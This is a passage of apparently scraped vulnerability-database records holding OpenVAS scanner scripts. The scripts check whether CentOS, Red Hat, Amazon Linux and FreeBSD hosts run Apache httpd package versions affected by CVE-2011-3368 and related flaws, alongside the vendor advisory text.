TRUE;\n}\nbver = portver(pkg:\"apache+ssl\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.43.1.59_2\")<0) {\n txt += 'Package apache+ssl version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = TRUE;\n}\nbver = portver(pkg:\"apache+ipv6\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.43\")<0) {\n txt += 'Package apache+ipv6 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = TRUE;\n}\nbver = portver(pkg:\"apache+mod_perl\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.43\")<0) {\n txt += 'Package apache+mod_perl version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = TRUE;\n}\nbver = portver(pkg:\"apache+mod_ssl\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.41+2.8.31_4\")<0) {\n txt += 'Package apache+mod_ssl version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = TRUE;\n}\nbver = portver(pkg:\"apache+mod_ssl+ipv6\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.41+2.8.31_4\")<0) {\n txt += 'Package apache+mod_ssl+ipv6 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = TRUE;\n}\nbver = portver(pkg:\"ru-apache-1.3\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.43+30.23_1\")<0) {\n txt += 'Package ru-apache-1.3 version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = TRUE;\n}\nbver = portver(pkg:\"ru-apache+mod_ssl\");\nif(!isnull(bver) && revcomp(a:bver, b:\"1.3.43+30.23_1\")<0) {\n txt += 'Package ru-apache+mod_ssl version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = TRUE;\n}\n\nif(vuln) {\n security_message(data:txt);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:38:31", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-3368", "CVE-2011-3192"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2012-07-30T00:00:00", "id": "OPENVAS:1361412562310881436", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881436", "type": "openvas", "title": "CentOS Update for httpd CESA-2011:1392 centos5 x86_64", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for httpd CESA-2011:1392 centos5 x86_64\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2011-October/018125.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.881436\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 17:52:05 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2011-3368\", \"CVE-2011-3192\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name:\"CESA\", value:\"2011:1392\");\n script_name(\"CentOS Update for httpd CESA-2011:1392 centos5 x86_64\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'httpd'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS5\");\n script_tag(name:\"affected\", value:\"httpd on CentOS 5\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"insight\", value:\"The Apache HTTP Server is a popular web server.\n\n It was discovered that the Apache HTTP Server did not properly validate the\n request URI for proxied requests. In certain configurations, if a reverse\n proxy used the ProxyPassMatch directive, or if it used the RewriteRule\n directive with the proxy flag, a remote attacker could make the proxy\n connect to an arbitrary server, possibly disclosing sensitive information\n from internal web servers not directly accessible to the attacker.\n (CVE-2011-3368)\n\n Red Hat would like to thank Context Information Security for reporting this\n issue.\n\n This update also fixes the following bug:\n\n * The fix for CVE-2011-3192 provided by the RHSA-2011:1245 update\n introduced regressions in the way httpd handled certain Range HTTP header\n values. This update corrects those regressions. (BZ#736593, BZ#736594)\n\n All httpd users should upgrade to these updated packages, which contain\n backported patches to correct these issues. After installing the updated\n packages, the httpd daemon must be restarted for the update to take effect.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.2.3~53.el5.centos.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.2.3~53.el5.centos.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.2.3~53.el5.centos.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.2.3~53.el5.centos.3\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-05-29T18:39:34", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-3368", "CVE-2011-3192"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2011-11-11T00:00:00", "id": "OPENVAS:1361412562310881032", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881032", "type": "openvas", "title": "CentOS Update for httpd CESA-2011:1392 centos4 i386", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for httpd CESA-2011:1392 centos4 i386\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2011-November/018171.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.881032\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2011-11-11 09:54:14 +0530 (Fri, 11 Nov 2011)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name:\"CESA\", value:\"2011:1392\");\n script_cve_id(\"CVE-2011-3368\", \"CVE-2011-3192\");\n script_name(\"CentOS Update for httpd CESA-2011:1392 centos4 i386\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'httpd'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS4\");\n script_tag(name:\"affected\", value:\"httpd on CentOS 4\");\n script_tag(name:\"insight\", value:\"The Apache HTTP Server is a popular web server.\n\n It was discovered that the Apache HTTP Server did not properly validate the\n request URI for proxied requests. In certain configurations, if a reverse\n proxy used the ProxyPassMatch directive, or if it used the RewriteRule\n directive with the proxy flag, a remote attacker could make the proxy\n connect to an arbitrary server, possibly disclosing sensitive information\n from internal web servers not directly accessible to the attacker.\n (CVE-2011-3368)\n\n Red Hat would like to thank Context Information Security for reporting this\n issue.\n\n This update also fixes the following bug:\n\n * The fix for CVE-2011-3192 provided by the RHSA-2011:1245 update\n introduced regressions in the way httpd handled certain Range HTTP header\n values. This update corrects those regressions. (BZ#736593, BZ#736594)\n\n All httpd users should upgrade to these updated packages, which contain\n backported patches to correct these issues. After installing the updated\n packages, the httpd daemon must be restarted for the update to take effect.\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS4\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.0.52~49.ent.centos4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.0.52~49.ent.centos4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.0.52~49.ent.centos4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-suexec\", rpm:\"httpd-suexec~2.0.52~49.ent.centos4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.0.52~49.ent.centos4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2020-03-17T23:03:53", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-3368", "CVE-2011-3348"], "description": "The remote host is missing an update announced via the referenced Security Advisory.", "modified": "2020-03-13T00:00:00", "published": "2015-09-08T00:00:00", "id": "OPENVAS:1361412562310120513", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310120513", "type": "openvas", "title": "Amazon Linux: Security Advisory (ALAS-2011-9)", "sourceData": "# Copyright (C) 2015 Eero Volotinen\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.120513\");\n script_version(\"2020-03-13T13:19:50+0000\");\n script_tag(name:\"creation_date\", value:\"2015-09-08 11:27:36 +0200 (Tue, 08 Sep 2015)\");\n script_tag(name:\"last_modification\", value:\"2020-03-13 13:19:50 +0000 (Fri, 13 Mar 2020)\");\n script_name(\"Amazon Linux: Security Advisory (ALAS-2011-9)\");\n script_tag(name:\"insight\", value:\"It was discovered that the Apache HTTP Server did not properly validate the request URI for proxied requests. In certain configurations, if a reverse proxy used the ProxyPassMatch directive, or if it used the RewriteRule directive with the proxy flag, a remote attacker could make the proxy connect to an arbitrary server, possibly disclosing sensitive information from internal web servers not directly accessible to the attacker. (CVE-2011-3368 )It was discovered that mod_proxy_ajp incorrectly returned an Internal Server Error response when processing certain malformed HTTP requests, which caused the back-end server to be marked as failed in configurations where mod_proxy was used in load balancer mode. A remote attacker could cause mod_proxy to not send requests to back-end AJP (Apache JServ Protocol) servers for the retry timeout period or until all back-end servers were marked as failed. (CVE-2011-3348 )\");\n script_tag(name:\"solution\", value:\"Run yum update httpd to update your system.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"https://alas.aws.amazon.com/ALAS-2011-9.html\");\n script_cve_id(\"CVE-2011-3368\", \"CVE-2011-3348\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:N/A:N\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/amazon_linux\", \"ssh/login/release\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"summary\", value:\"The remote host is missing an update announced via the referenced Security Advisory.\");\n script_copyright(\"Copyright (C) 2015 Eero Volotinen\");\n script_family(\"Amazon Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"AMAZON\") {\n if(!isnull(res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.2.21~1.19.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"httpd-tools\", rpm:\"httpd-tools~2.2.21~1.19.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.2.21~1.19.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.2.21~1.19.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.2.21~1.19.amzn1\", rls:\"AMAZON\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-05-29T18:39:16", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-3368", "CVE-2011-3192"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2012-07-30T00:00:00", "id": "OPENVAS:1361412562310881450", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881450", "type": "openvas", "title": "CentOS Update for httpd CESA-2011:1392 centos4 x86_64", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for httpd CESA-2011:1392 centos4 x86_64\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2011-November/018172.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.881450\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 17:54:04 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2011-3368\", \"CVE-2011-3192\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name:\"CESA\", value:\"2011:1392\");\n script_name(\"CentOS Update for httpd CESA-2011:1392 centos4 x86_64\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'httpd'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS4\");\n script_tag(name:\"affected\", value:\"httpd on CentOS 4\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"insight\", value:\"The Apache HTTP Server is a popular web server.\n\n It was discovered that the Apache HTTP Server did not properly validate the\n request URI for proxied requests. In certain configurations, if a reverse\n proxy used the ProxyPassMatch directive, or if it used the RewriteRule\n directive with the proxy flag, a remote attacker could make the proxy\n connect to an arbitrary server, possibly disclosing sensitive information\n from internal web servers not directly accessible to the attacker.\n (CVE-2011-3368)\n\n Red Hat would like to thank Context Information Security for reporting this\n issue.\n\n This update also fixes the following bug:\n\n * The fix for CVE-2011-3192 provided by the RHSA-2011:1245 update\n introduced regressions in the way httpd handled certain Range HTTP header\n values. This update corrects those regressions. (BZ#736593, BZ#736594)\n\n All httpd users should upgrade to these updated packages, which contain\n backported patches to correct these issues. After installing the updated\n packages, the httpd daemon must be restarted for the update to take effect.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS4\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.0.52~49.ent.centos4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.0.52~49.ent.centos4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.0.52~49.ent.centos4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-suexec\", rpm:\"httpd-suexec~2.0.52~49.ent.centos4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.0.52~49.ent.centos4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2018-01-02T10:57:07", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-3368", "CVE-2011-3192"], "description": "Check for the Version of httpd", "modified": "2017-12-28T00:00:00", "published": "2012-07-30T00:00:00", "id": "OPENVAS:881450", "href": "http://plugins.openvas.org/nasl.php?oid=881450", "type": "openvas", "title": "CentOS Update for httpd CESA-2011:1392 centos4 x86_64", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for httpd CESA-2011:1392 centos4 x86_64\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The Apache HTTP Server is a popular web server.\n\n It was discovered that the Apache HTTP Server did not properly validate the\n request URI for proxied requests. In certain configurations, if a reverse\n proxy used the ProxyPassMatch directive, or if it used the RewriteRule\n directive with the proxy flag, a remote attacker could make the proxy\n connect to an arbitrary server, possibly disclosing sensitive information\n from internal web servers not directly accessible to the attacker.\n (CVE-2011-3368)\n \n Red Hat would like to thank Context Information Security for reporting this\n issue.\n \n This update also fixes the following bug:\n \n * The fix for CVE-2011-3192 provided by the RHSA-2011:1245 update\n introduced regressions in the way httpd handled certain Range HTTP header\n values. This update corrects those regressions. (BZ#736593, BZ#736594)\n \n All httpd users should upgrade to these updated packages, which contain\n backported patches to correct these issues. After installing the updated\n packages, the httpd daemon must be restarted for the update to take effect.\";\n\ntag_affected = \"httpd on CentOS 4\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2011-November/018172.html\");\n script_id(881450);\n script_version(\"$Revision: 8253 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-28 07:29:51 +0100 (Thu, 28 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-07-30 17:54:04 +0530 (Mon, 30 Jul 2012)\");\n script_cve_id(\"CVE-2011-3368\", \"CVE-2011-3192\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name: \"CESA\", value: \"2011:1392\");\n script_name(\"CentOS Update for httpd CESA-2011:1392 centos4 x86_64\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of httpd\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS4\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.0.52~49.ent.centos4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-devel\", rpm:\"httpd-devel~2.0.52~49.ent.centos4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-manual\", rpm:\"httpd-manual~2.0.52~49.ent.centos4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-suexec\", rpm:\"httpd-suexec~2.0.52~49.ent.centos4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mod_ssl\", rpm:\"mod_ssl~2.0.52~49.ent.centos4\", rls:\"CentOS4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2017-07-27T10:55:27", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-3368", "CVE-2011-3192"], "description": "Check for the Version of httpd", "modified": "2017-07-12T00:00:00", "published": "2011-10-21T00:00:00", "id": "OPENVAS:870505", "href": "http://plugins.openvas.org/nasl.php?oid=870505", "type": "openvas", "title": "RedHat Update for httpd RHSA-2011:1392-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for httpd RHSA-2011:1392-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2011 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"The Apache HTTP Server is a popular web server.\n\n It was discovered that the Apache HTTP Server did not properly validate the\n request URI for proxied requests. In certain configurations, if a reverse\n proxy used the ProxyPassMatch directive, or if it used the RewriteRule\n directive with the proxy flag, a remote attacker could make the proxy\n connect to an arbitrary server, possibly disclosing sensitive information\n from internal web servers not directly accessible to the attacker.\n (CVE-2011-3368)\n \n Red Hat would like to thank Context Information Security for reporting this\n issue.\n \n This update also fixes the following bug:\n \n * The fix for CVE-2011-3192 provided by the RHSA-2011:1245 update\n introduced regressions in the way httpd handled certain Range HTTP header\n values. This update corrects those regressions. (BZ#736593, BZ#736594)\n \n All httpd users should upgrade to these updated packages, which contain\n backported patches to correct these issues. After installing the updated\n packages, the httpd daemon must be restarted for the update to take effect.\";\n\ntag_affected = \"httpd on Red Hat Enterprise Linux (v. 5 server),\n Red Hat Enterprise Linux AS version 4,\n Red Hat Enterprise Linux ES version 4,\n Red Hat Enterprise Linux WS version 4\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2011-October/msg00016.html\");\n script_id(870505);\n script_version(\"$Revision: 6685 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-12 11:44:46 +0200 (Wed, 12 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2011-10-21 16:31:29 +0200 (Fri, 21 Oct 2011)\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_xref(name: \"RHSA\", value: \"2011:1392-01\");\n script_cve_id(\"CVE-2011-3368\", \"CVE-2011-3192\");\n script_name(\"RedHat Update for httpd RHSA-2011:1392-01\");\n\n script_summary(\"Check for the Version of httpd\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2011 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"httpd\", rpm:\"httpd~2.2.3~53.el5_7.3\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"httpd-debuginfo\", rpm:\"httpd-debuginfo~2.2.3~53.el5_7.3\", rls:\"RHENT_5\")) != 